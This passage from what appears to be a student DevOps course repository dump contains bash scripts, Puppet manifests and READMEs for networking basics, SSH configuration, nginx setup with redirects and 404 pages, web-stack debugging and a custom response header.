    "content": "#!/usr/bin/env bash\n# Displays all acive IPv4 addresses on the machine.\n\n# a different way using ifconfig but now ip is a new command and ifconfig can be missing in some os\n#ifconfig | grep -Eo \"inet (addr:)?([0-9]*\\.){3}[0-9]*\" | awk '{print $2}'\n\nip -4 -o addr show | awk '{print $4}' | cut -d \"/\" -f 1\n\n"
  },
  {
    "path": "0x08-networking_basics_2/100-port_listening_on_localhost",
    "content": "#!/usr/bin/env bash\n# a script that listens on poer 98 on localhost\n\nnc -l localhost 98\n"
  },
  {
    "path": "0x08-networking_basics_2/README.md",
    "content": "# 0x08. Networking basics #1\n\n## Resource\n\n- [What is localhost](https://en.wikipedia.org/wiki/Localhost)\n- [What is 0.0.0.0](https://en.wikipedia.org/wiki/0.0.0.0)\n- [What is the hosts file](https://www.makeuseof.com/tag/modify-manage-hosts-file-linux/)\n- [Netcat examples](https://www.thegeekstuff.com/2012/04/nc-command-examples/)\n\n## Tasks\n\n<details>\n<summary><a href=\"./0-change_your_home_IP\">0. Change your home IP</a></summary><br>\n<a href='https://postimg.cc/949cJmZ5' target='_blank'><img src='https://i.postimg.cc/W4Wtpt43/image.png' border='0' alt='image'/></a>\n<ul>\n  <li>Links from screenshot\n  <ul>\n      <li><a href=\"https://web.archive.org/web/20171117023601/http://blog.jonathanargentiero.com/docker-sed-cannot-rename-etcsedl8ysxl-device-or-resource-busy/\">Read this because the checker is running on docker</a></li>\n  </ul>\n  </li>\n</ul>\n</details>\n\n<details>\n<summary><a href=\"./1-show_attached_IPs\">1. Show attached IPs</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/Kjn0h65Z/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./100-port_listening_on_localhost\">2. Port listening on localhost</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/9QTZ8dJh/image.png' border='0' alt='image'/></a>\n</details>\n"
  },
  {
    "path": "0x09-web_infrastructure_design/README.md",
    "content": "# 0x09. Web infrastructure design \n\n## Resource\n\n- [Web Infrastructure](https://youtu.be/lQNEW76KdYg)\n- [What is a database](https://searchdatamanagement.techtarget.com/definition/database)\n- [What’s the difference between a web server and an app server?](https://www.youtube.com/watch?v=S97eKyv2b9M)\n- [DNS record types](https://pressable.com/?s=DNS&post_type=knowledgebase)\n- [Single point of failure](https://en.wikipedia.org/wiki/Single_point_of_failure)\n- [How to avoid downtime when deploying new code](https://softwareengineering.stackexchange.com/questions/35063/how-do-you-update-your-production-codebase-database-schema-without-causing-downt#answers-header)\n- [High availability cluster (active-active/active-passive)](https://docs.oracle.com/cd/E17904_01/core.1111/e10106/intro.htm#ASHIA712)\n- [What is HTTPS](https://www.instantssl.com/http-vs-https)\n- [What is a firewall](https://www.webopedia.com/definitions/firewall/)\n- [Load Balancing Algorithms and Techniques](https://kemptechnologies.com/load-balancer/load-balancing-algorithms-techniques/)\n- [Active/Passive vs. Active/Active](https://kemptechnologies.com/fr/white-papers/unfog-confusion-active-passive-activeactive-load-balancing/)\n\n## Tasks\n\n<details>\n<summary><a href=\"./0-simple_web_stack.jpg\">0. Simple web stack</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/jdk2SN17/image.png' border='0' alt='image'/></a>\n<ul>\n  <li>Links from screenshot\n  <ul>\n      <li><a href=\"https://en.wikipedia.org/wiki/LAMP_%28software_bundle%29\">LAMP stack</a></li>\n  </ul>\n  </li>\n</ul>\n</details>\n\n<details>\n<summary><a href=\"./1-distributed_web_infrastructure.jpg\">1. Distributed web infrastructure</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/MTwSdKn5/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./2-secured_and_monitored_web_infrastructure.jpg\">2. Secured and monitored web infrastructure</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/KYsZdtCJ/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./3-scale_up.jpg\">3. Scale up</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/13ndnc2x/image.png' border='0' alt='image'/></a>\n<ul>\n  <li>Links from screenshot\n  <ul>\n      <li><a href=\"https://www.nginx.com/resources/glossary/application-server-vs-web-server/\">Application server vs web server</a></li>\n  </ul>\n  </li>\n</ul>\n</details>\n"
  },
  {
    "path": "0x0A-configuration_management/0-create_a_file.pp",
    "content": "# Creates a file\nfile { '/tmp/school':\n  ensure  => file,\n  path    => '/tmp/school',\n  mode    => '0744',\n  owner   => 'www-data',\n  group   => 'www-data',\n  content => 'I love Puppet'\n}\n"
  },
  {
    "path": "0x0A-configuration_management/1-install_a_package.pp",
    "content": "# Install puppet-lint\npackage { 'puppet-lint':\n  ensure   => '2.5.0',\n  provider => 'gem'\n}\n"
  },
  {
    "path": "0x0A-configuration_management/2-execute_a_command.pp",
    "content": "# execute pkill command to kill bashscript file killmenow\nexec { 'pkill':\n  command => 'pkill -9 -f killmenow',\n  path    => ['/usr/bin', '/usr/sbin', '/bin']\n}\n"
  },
  {
    "path": "0x0A-configuration_management/README.md",
    "content": "# 0x0A. Configuration management\n\n## Resource\n\n- [Intro to Configuration Management](https://www.digitalocean.com/community/tutorials/an-introduction-to-configuration-management)\n- [Puppet resource type: file](https://puppet.com/docs/puppet/5.5/types/file.html) (*Check \"Resource types\" for all manifest types in the left menu*)\n- [Puppet’s Declarative Language: Modeling Instead of Scripting](https://puppet.com/blog/puppets-declarative-language-modeling-instead-of-scripting/)\n- [Puppet lint](http://puppet-lint.com/)\n- [Puppet emacs mode](https://github.com/voxpupuli/puppet-mode)\n- [Puppet CookBook](https://www.puppetcookbook.com/)\n\n## Installing `puppet` and `puppet-lint`\n\n```sh\n# installing puppet and puppet-lint\nwget https://apt.puppet.com/puppet7-release-focal.deb && \\\n    dpkg -i puppet7-release-focal.deb && \\\n    apt-get update && \\\n    apt-get install puppet-agent puppet-lint -y\n\n# confirming installation\npuppet -V\npuppet-lint -v\n\n# If you get an error saying puppet command not found, source the path\nsource /etc/profile.d/puppet-agent.sh\n```\n\n## Tasks\n\n<details>\n<summary><a href=\"./0-create_a_file.pp\">0. Create a file</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/NM2k46hX/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./1-install_a_package.pp\">1. Install a package</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/PqVvKj7c/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./2-execute_a_command.pp\">2. Execute a command</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/CxZFC13P/image.png' border='0' alt='image'/></a>\n</details>\n"
  },
  {
    "path": "0x0A-configuration_management/killmenow",
    "content": "#!/bin/bash\nwhile [[ true ]]\ndo\n    sleep 2\ndone\n"
  },
  {
    "path": "0x0B-ssh/0-use_a_private_key",
    "content": "#!/usr/bin/env bash\n# Allows us to connect to my server using the private key with user ubuntu\nssh -i ~/.ssh/school ubuntu@35.243.128.200\n"
  },
  {
    "path": "0x0B-ssh/1-create_ssh_key_pair",
    "content": "#!/usr/bin/env bash\n# Creates an RSA SSH key pair\nssh-keygen -f school -b 4096 -N betty\n"
  },
  {
    "path": "0x0B-ssh/100-puppet_ssh_config.pp",
    "content": "# using puppet to make changes to the default ssh config file\n# so that one can connect to a server without typing a password.\n\ninclude stdlib\n\nfile_line { 'SSH Private Key':\n  path               => '/etc/ssh/ssh_config',\n  line               => '    IdentityFile ~/.ssh/school',\n  match              => '^[#]+[\\s]*(?i)IdentityFile[\\s]+~/.ssh/id_rsa$',\n  replace            => true,\n  append_on_no_match => true\n}\n\n# Regex match explanation\n#\n# ^       beginning of the line\n# [#]*  atleast one hash character\n# [\\s]*  zero or more white space characters\n# (?i)IdentityFile case insensitive \"IdentityFile\"\n# [\\s]+ at least one whitespace character\n# ~/.ssh/id_rsa The ssh private key file path we want to replace\n# $      end of the line\n\nfile_line { 'Deny Password Auth':\n  path               => '/etc/ssh/ssh_config',\n  line               => '    PasswordAuthentication no',\n  match              => '^[#]+[\\s]*(?i)PasswordAuthentication[\\s]+(yes|no)$',\n  replace            => true,\n  append_on_no_match => true\n}\n\n# Regex match explanation\n#\n# ^       beginning of the line\n# [#]*  atleast one hash character\n# [\\s]*  zero or more white space characters\n# (?i)PasswordAuthentication case insensitive \"PasswordAuthentication\"\n# [\\s]+ at least one whitespace character\n# (yes|no) with the value \"yes\" or the value \"no\"\n# $      end of the line\n"
  },
  {
    "path": "0x0B-ssh/2-ssh_config",
    "content": "# SSH Config File\n#\nHost web-01\n\tHostname 35.243.128.200\n\tUser ubuntu\n\tPasswordAuthentication no\n\tIdentityFile ~/.ssh/school\n"
  },
  {
    "path": "0x0B-ssh/README.md",
    "content": "# 0x0B. SSH \n\n## Resource\n\n- [What is a (physical) server - text](https://en.wikipedia.org/wiki/Server_%28computing%29#Hardware_requirement)\n- [What is a (physical) server - video](https://www.youtube.com/watch?v=B1ANfsDyjeA)\n- [SSH essentials](https://www.digitalocean.com/community/tutorials/ssh-essentials-working-with-ssh-servers-clients-and-keys)\n- [SSH Config File](https://www.ssh.com/academy/ssh/config)\n- [Public Key Authentication for SSH](https://www.ssh.com/academy/ssh/public-key-authentication)\n- [How Secure Shell Works](https://www.youtube.com/watch?v=ORcvSkgdA58)\n- [SSH Crash Course](https://www.youtube.com/watch?v=hQWRp-FdTpc) (*(Long, but highly informative. Watch this if configuring SSH is still confusing. It may be helpful to watch at x1.25 speed or above.*)\n\n### For reference:\n\n- [Understanding the SSH Encryption and Connection Process](https://www.digitalocean.com/community/tutorials/understanding-the-ssh-encryption-and-connection-process)\n- [Secure Shell Wiki](https://en.wikipedia.org/wiki/Secure_Shell)\n- [IETF RFC 4251 (Description of the SSH Protocol)](https://www.ietf.org/rfc/rfc4251.txt)\n- [Internet Engineering Task Force](https://en.wikipedia.org/wiki/Internet_Engineering_Task_Force)\n- [Request for Comments (RFCs)](https://en.wikipedia.org/wiki/Request_for_Comments)\n\n## Tasks\n\n<details>\n<summary><a href=\"./0-use_a_private_key\">0. Use a private key</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/yW4gBSpM/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./1-create_ssh_key_pair\">1. Create an SSH key pair</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/pXPbpdbx/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./2-ssh_config\">2. Client configuration file</a></summary><br>\n<a href='https://postimg.cc/Hjb2CMHK' target='_blank'><img src='https://i.postimg.cc/y6brchGV/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary>3. Let me in!</summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/3N2k9F3k/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./100-puppet_ssh_config.pp\">4. Client configuration file (w/ Puppet)</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/ryBvRXzV/image.png' border='0' alt='image'/></a><br>\n<ul><li>Install puppet stdlib module;</li></ul>\n<pre>sudo puppet module install puppetlabs-stdlib</pre>\n</details>\n\n"
  },
  {
    "path": "0x0C-web_server/0-transfer_file",
    "content": "#!/usr/bin/env bash\n# Transfers a file from our client to a server\n#\n# variables\npath=\"$(cd \"$(dirname \"${BASH_SOURCE[0]}\")\" >/dev/null 2>&1 && pwd)\"\nfilename=$(basename \"$BASH_SOURCE\")\nbrown='\\e[0;33m'\nreset='\\033[0m'\nfile=\"$1\"\nip=\"$2\"\nuser=\"$3\"\nkey=\"$4\"\n\nif [ $# -eq 4 ]; then\n\tscp -i \"$key\" -o StrictHostKeyChecking=no \"$path\"/\"$file\" \"$user\"@\"$ip\":/home/\"$user\"/\nelse\n\techo -e \"Usage: ${brown}$filename PATH_TO_FILE IP USERNAME PATH_TO_SSH_KEY${reset}\"\nfi\n"
  },
  {
    "path": "0x0C-web_server/1-install_nginx_web_server",
    "content": "#!/usr/bin/env bash\n# Configures a new ubuntu machine by installing\n# Nginx where it should be listening on port 80\n# Serve a page that would return a Hello World string\n#\n# colors\nblue='\\e[1;34m'\nbrown='\\e[0;33m'\ngreen='\\e[1;32m'\nreset='\\033[0m'\n\necho -e \"${blue}Updating and installing ${brown}Nginx${blue}.${reset}\\n\"\nsudo apt-get update -y -qq && \\\n\t sudo apt-get install nginx -y\n\necho -e \"\\n${blue}Setting up some minor stuff.${reset}\\n\"\n\n# starting nginx service\nsudo service nginx start\n\n# allowing nginx on firewall\nsudo ufw allow 'Nginx HTTP'\n\n# Give the user ownership to website files for easy editing\nsudo chown -R \"$USER\":\"$USER\" /var/www/html\nsudo chmod -R 755 /var/www\n\n# Backup default index\ncp /var/www/html/index.nginx-debian.html /var/www/html/index.nginx-debian.html.bckp\n\n# Creating new index\necho -e \"Hello World!\" | dd status=none of=/var/www/html/index.nginx-debian.html\n\n# Restarting nginx\nsudo service nginx restart\n\necho -e \"\\n${green}Completed.${reset} ✅\\n\"\n"
  },
  {
    "path": "0x0C-web_server/2-setup_a_domain_name",
    "content": "th3gr00t.tech\n"
  },
  {
    "path": "0x0C-web_server/3-redirection",
    "content": "#!/usr/bin/env bash\n# Configures a new ubuntu machine by installing\n# Nginx where it should be listening on port 80\n# Serve a page that would return a Hello World string\n#\n# colors\nblue='\\e[1;34m'\nbrown='\\e[0;33m'\ngreen='\\e[1;32m'\nreset='\\033[0m'\n\necho -e \"${blue}Updating and installing ${brown}Nginx${blue}.${reset}\\n\"\nsudo apt-get update -y -qq && \\\n\t sudo apt-get install nginx -y\n\necho -e \"\\n${blue}Setting up some minor stuff.${reset}\\n\"\n\n# starting nginx service\nsudo service nginx start\n\n# allowing nginx on firewall\nsudo ufw allow 'Nginx HTTP'\n\n# Give the user ownership to website files for easy editing\nsudo chown -R \"$USER\":\"$USER\" /var/www/html\nsudo chmod -R 755 /var/www\n\n# Backup default index\ncp /var/www/html/index.nginx-debian.html /var/www/html/index.nginx-debian.html.bckp\n\n# Creating new index\necho -e \"Hello World!\" > /var/www/html/index.nginx-debian.html\n\n# Setting up /redirect_me to a youtube video\nsudo sed -i '24i\\\trewrite ^/redirect_me https://www.youtube.com/watch?v=QH2-TGUlwu4 permanent;' /etc/nginx/sites-available/default\n\n# Restarting nginx\nsudo service nginx restart\n\necho -e \"\\n${green}Completed.${reset} ✅\\n\"\n"
  },
  {
    "path": "0x0C-web_server/4-not_found_page_404",
    "content": "#!/usr/bin/env bash\n# Configures a new ubuntu machine by installing\n# Nginx where it should be listening on port 80\n# Serve a page that would return a Hello World string\n#\n# colors\nblue='\\e[1;34m'\nbrown='\\e[0;33m'\ngreen='\\e[1;32m'\nreset='\\033[0m'\n\necho -e \"${blue}Updating and installing ${brown}Nginx${blue}.${reset}\\n\"\nsudo apt-get update -y -qq && \\\n\t sudo apt-get install nginx -y\n\necho -e \"\\n${blue}Setting up some minor stuff.${reset}\\n\"\n\n# starting nginx service\nsudo service nginx start\n\n# allowing nginx on firewall\nsudo ufw allow 'Nginx HTTP'\n\n# Give the user ownership to website files for easy editing\nsudo chown -R \"$USER\":\"$USER\" /var/www/html\nsudo chmod -R 755 /var/www\n\n# Backup default index\ncp /var/www/html/index.nginx-debian.html /var/www/html/index.nginx-debian.html.bckp\n\n# Creating new index\necho -e \"Hello World!\" > /var/www/html/index.nginx-debian.html\n\n# Setting up /redirect_me to a youtube video\nsudo sed -i '24i\\\trewrite ^/redirect_me https://www.youtube.com/watch?v=QH2-TGUlwu4 permanent;' /etc/nginx/sites-available/default\n\n# Set up a 404 page\necho \"Ceci n'est pas une page\" >> /var/www/html/error_404.html\nsudo sed -i '25i\\\terror_page 404 /error_404.html;' /etc/nginx/sites-available/default\n\n# Restarting nginx\nsudo service nginx restart\n\necho -e \"\\n${green}Completed.${reset} ✅\\n\"\n"
  },
  {
    "path": "0x0C-web_server/7-puppet_install_nginx_web_server.pp",
    "content": "# Setup New Ubuntu server with nginx\n\nexec { 'update system':\n        command => '/usr/bin/apt-get update',\n}\n\npackage { 'nginx':\n\tensure => 'installed',\n\trequire => Exec['update system']\n}\n\nfile {'/var/www/html/index.html':\n\tcontent => 'Hello World!'\n}\n\nexec {'redirect_me':\n\tcommand => 'sed -i \"24i\\\trewrite ^/redirect_me https://www.youtube.com/watch?v=QH2-TGUlwu4 permanent;\" /etc/nginx/sites-available/default',\n\tprovider => 'shell'\n}\n\nservice {'nginx':\n\tensure => running,\n\trequire => Package['nginx']\n}\n"
  },
  {
    "path": "0x0C-web_server/README.md",
    "content": "# 0x0C. Web server\n\n<p align=\"center\">\n  <img src=\"https://s3.amazonaws.com/intranet-projects-files/holbertonschool-sysadmin_devops/266/8Gu52Qv.png\" />\n</p>\n\n## Resource\n\n<details>\n<summary><a href=\"https://www.gnu.org/software/libc/manual/html_node/Processes.html#Processes\">Child Process</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/bw6hYBS5/image.png' border='0' alt='image'/></a>\n</details>\n\n- [Background contenxt](https://www.youtube.com/watch?v=AZg4uJkEa-4)\n- [How the web works](https://developer.mozilla.org/en-US/docs/Learn/Getting_started_with_the_web/How_the_Web_works)\n- [Nginx](https://en.wikipedia.org/wiki/Nginx)\n- [How to Configure Nginx](https://www.digitalocean.com/community/tutorials/how-to-set-up-nginx-server-blocks-virtual-hosts-on-ubuntu-16-04)\n- [Root and sub domain](https://landingi.com/help/domains-vs-subdomains/)\n- [HTTP requests](https://www.tutorialspoint.com/http/http_methods.htm)\n- [HTTP redirection](https://moz.com/learn/seo/redirection)\n- [Not found HTTP response code](https://en.wikipedia.org/wiki/HTTP_404)\n- [Logs files on Linux](https://www.cyberciti.biz/faq/ubuntu-linux-gnome-system-log-viewer/)\n- [RFC 7231 (HTTP/1.1)](https://datatracker.ietf.org/doc/html/rfc7231)\n- [RFC 7540 (HTTP/2)](https://datatracker.ietf.org/doc/html/rfc7540)\n\n## Tasks\n\n<details>\n<summary><a href=\"./0-transfer_file\">0. Transfer a file to your server</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/j2P4SmgY/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./1-install_nginx_web_server\">1. Install nginx web server</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/QMbf1FrY/image.png' border='0' alt='image'/></a>\n<a href='https://postimg.cc/621fsx68' target='_blank'><img src='https://i.postimg.cc/vTGqVGpt/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./2-setup_a_domain_name\">2. Setup a domain name</a></summary><br>\n<a href='https://postimg.cc/svdGgYqp' target='_blank'><img src='https://i.postimg.cc/L6htvvV0/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./3-redirection\">3. Redirection</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/tTmZ8GqZ/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./4-not_found_page_404\">4. Not found page 404</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/zvhdBrG6/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./7-puppet_install_nginx_web_server.pp\">5. Install Nginx web server (w/ Puppet)</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/Vs2dxb0D/image.png' border='0' alt='image'/></a>\n</details>\n"
  },
  {
    "path": "0x0D-web_stack_debugging_0/0-give_me_a_page",
    "content": "#!/usr/bin/env bash\n# Start Apache so as to return a\n# page conatining Hello Holberton\nservice apache2 start\n"
  },
  {
    "path": "0x0D-web_stack_debugging_0/README.md",
    "content": "# 0x0D. Web stack debugging #0 \n\n<p align=\"center\">\n  <img src=\"https://s3.amazonaws.com/intranet-projects-files/holbertonschool-sysadmin_devops/265/uWLzjc8.jpg\" />\n</p>\n\n## Resource\n\n### Concepts\n\n<details>\n<summary>Network basics</summary><br>\n<ul>\n  <li>Networking is a big part of what made computers so powerful and why the Internet exists. It allows machines to communicate with each other.\n  <ul> <li><a href=\"https://www.techtarget.com/searchnetworking/definition/protocol\">What is a protocol.</a></li> </ul>\n  <ul> <li><a href=\"https://computer.howstuffworks.com/internet/basics/what-is-an-ip-address.htm\">What is an IP address.</a></li> </ul>\n  <ul> <li><a href=\"https://www.techtarget.com/searchnetworking/definition/TCP-IP\">What is TCP/IP.</a></li> </ul>\n  <ul> <li><a href=\"https://www.lifewire.com/port-numbers-on-computer-networks-817939\">What is an Internet Protocol (IP) port?.</a></li> </ul>\n  </li>\n</ul>\n</details>\n\n<details>\n<summary>Docker</summary><br>\n<ul>\n  <li>Readme\n  <ul> <li><a href=\"https://www.zdnet.com/article/what-is-docker-and-why-is-it-so-darn-popular/\">What is Docker and why is it popular</a></li> </ul>\n  </li>\n</ul>\n\n<details>\n<summary>Let's first pull a Docker image and run a container:</summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/13tHWGzc/image.png' border='0' alt='image'/></a>\n</details>\n\nNote that `docker` command will pull the Ubuntu docker container image from the Internet and run it. I let you look at the meaning of the flags using the command `docker run --help`, the main idea is that it keeps the container up and running.\n\n<details>\n<summary>To execute a command on the Docker container, use *docker exec*:</summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/fLLDygWS/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary>If you want to connect to your Docker container and use Bash, you need to use *docker exec -ti*:</summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/433xH3B3/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary>If you want to stop a container, use *docker stop*:</summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/sxCzmf97/image.png' border='0' alt='image'/></a>\n</details>\n\n</details>\n\n<details>\n<summary>Web stack debugging</summary><br>\n<ul>\n  <li>Intro\n  <ul>Debugging usually takes a big chunk of a software engineer’s time. The art of debugging is tough and it takes years, even decades to master, and that is why seasoned software engineers are the best at it… experience. They have seen lots of broken code, buggy systems, weird edge cases and race conditions.</ul>\n\n  <p align=\"center\">\n   <img src=\"https://s3.amazonaws.com/alx-intranet.hbtn.io/uploads/medias/2020/9/45dffb0b1da8dc2ce47e340d7f88b05652c0f486.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIARDDGGGOUSBVO6H7D%2F20220105%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220105T050302Z&X-Amz-Expires=86400&X-Amz-SignedHeaders=host&X-Amz-Signature=d499fde872931932fc76dedd39b4298797482fd9b7ca1fc09f0a885ea8aa1cae\" />\n  </p>\n  </li>\n</ul>\n\n<details>\n<summary>Test and verify your assumptions</summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/rFMtkCt8/image.png' border='0' alt='image'/></a>\n</details>\n\n<ul>\n  <li>Debugging is fun\n  <ul>Debugging can be frustrating, but it will definitely be part of your job, it requires experience and methodology to become good at it. The good news is that bugs are never going away, and the more experienced you become, trickier bugs will be assigned to you! Good luck 😃</ul>\n\n  <p align=\"center\">\n   <img src=\"https://s3.amazonaws.com/alx-intranet.hbtn.io/uploads/medias/2020/9/bae58c9f066a9668001ef4b4c39778407439d2f9.gif?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIARDDGGGOUSBVO6H7D%2F20220105%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220105T050302Z&X-Amz-Expires=86400&X-Amz-SignedHeaders=host&X-Amz-Signature=67d4c1d736b92bef534ab94427ff3bef2c8ad4b498cafb512fbe6f6ddefec9ba\" />\n  </p>\n  </li>\n</ul>\n\n</details>\n\n## Tasks\n\n<details>\n<summary><a href=\"./0-give_me_a_page\">0. Give me a page!</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/yxybJXPm/image.png' border='0' alt='image'/></a>\n<br>\n<ul>\n  <li>Advice; install docker on your local machine then pull the docker image debug the issue then proceed.</li>\n<ul>\nAVOID installing docker in ubuntu 14.04\n</details>\n"
  },
  {
    "path": "0x0E-web_stack_debugging_1/0-nginx_likes_port_80",
    "content": "#!/usr/bin/env bash\n# configures a server to listening on port 80 of all server's active IPv4 IPs\n\nsudo sed -i \"s/8080/80/\" /etc/nginx/sites-enabled/default\nsudo service nginx restart\n"
  },
  {
    "path": "0x0E-web_stack_debugging_1/1-debugging_made_short",
    "content": "#!/usr/bin/env bash\n# configures a server to listening on port 80 of all server's active IPv4 IPs\nsudo sed -i \"s/8080/80/\" /etc/nginx/sites-enabled/default\nsudo service nginx restart\necho \"\" | sudo dd status=none of=/run/nginx.pid\n"
  },
  {
    "path": "0x0E-web_stack_debugging_1/README.md",
    "content": "# 0x0E. Web stack debugging #1 \n\n<p align=\"center\">\n  <img src=\"https://s3.amazonaws.com/intranet-projects-files/holbertonschool-sysadmin_devops/271/B4eeypV.jpg\" />\n</p>\n\n## Resource\n\n- [Resources from Web stack debugging #0](https://github.com/iAmG-r00t/alx-system_engineering-devops/tree/main/0x0D-web_stack_debugging_0#resource)\n\n\n## Tasks\n\n<details>\n<summary><a href=\"./0-nginx_likes_port_80\">0. Nginx likes port 80</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/43fwt3rJ/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./1-debugging_made_short\">1. Make it sweet and short</a></summary><br>\n<a href='https://postimg.cc/dDNKGf46' target='_blank'><img src='https://i.postimg.cc/FsNsX5SM/image.png' border='0' alt='image'/></a>\n</details>\n"
  },
  {
    "path": "0x0F-load_balancer/0-custom_http_response_header",
    "content": "#!/usr/bin/env bash\n# duplicate web-01 to web-02\n# these scripts are an upgrade from the web-server scripts...\n\n# uncomment to see the script run in action\n#set -x\n\n# colors\nblue='\\e[1;34m'\nbrown='\\e[0;33m'\ngreen='\\e[1;32m'\nreset='\\033[0m'\n\necho -e \"${blue}Updating and doing some minor checks...${reset}\\n\"\n\nfunction install() {\n\tcommand -v \"$1\" &> /dev/null\n\n\t#shellcheck disable=SC2181\n\tif [ $? -ne 0 ]; then\n\t\techo -e \"\tInstalling: ${brown}$1${reset}\\n\"\n\t\tsudo apt-get update -y -qq && \\\n\t\t\tsudo apt-get install -y \"$1\" -qq\n\t\techo -e \"\\n\"\n\telse\n\t\techo -e \"\t${green}${1} is already installed.${reset}\\n\"\n\tfi\n}\n\ninstall nginx #install nginx\n\necho -e \"\\n${blue}Setting up some minor stuff.${reset}\\n\"\n\n# allowing nginx on firewall\nsudo ufw allow 'Nginx HTTP'\n\n# Give the user ownership to website files for easy editing\nif [ -d \"/var/www\" ]; then\n\tsudo chown -R \"$USER\":\"$USER\" /var/www\n\tsudo chmod -R 755 /var/www\nelse\n\tsudo mkdir -p /var/www\n\tsudo chown -R \"$USER\":\"$USER\" /var/www\n\tsudo chmod -R 755 /var/www\nfi\n\n# create directories if not present\nfor dir in /var/www/{html,error}; do\n\tif ! [ -d \"$dir\" ]; then\n\t\tmkdir -p \"$dir\"\n\tfi\ndone\n\n# creating new index\necho \"Hello World!\" > /var/www/html/index.html\n\n# create new error page\necho \"Ceci n'est pas une page\" > /var/www/html/error_404.html\n\n# backup default server config file\nsudo cp /etc/nginx/sites-enabled/default nginx-sites-enabled_default.backup\n\nserver_config=\\\n\"server {\n\t\tlisten 80 default_server;\n\t\tlisten [::]:80 default_server;\n\t\troot /var/www/html;\n\t\tindex index.html index.htm index.nginx-debian.html\n\t\tserver_name_;\n\t\tadd_header X-Served-By \\$hostname;\n\t\tlocation / {\n\t\t\ttry_files \\$uri \\$uri/ =404;\n\t\t}\n\t\tif (\\$request_filename ~ redirect_me){\n\t\t\trewrite ^ https://th3-gr00t.tk/ permanent;\n\t\t}\n\t\terror_page 404 /error_404.html;\n\t\tlocation = /error_404.html {\n\t\t\tinternal;\n\t\t}\n}\"\n\n#shellcheck disable=SC2154\necho \"$server_config\" | sudo dd status=none of=/etc/nginx/sites-enabled/default\n\nif [ \"$(pgrep -c nginx)\" -le 0 ]; then\n\tsudo service nginx start\nelse\n\tsudo service nginx restart\nfi\n"
  },
  {
    "path": "0x0F-load_balancer/1-install_load_balancer",
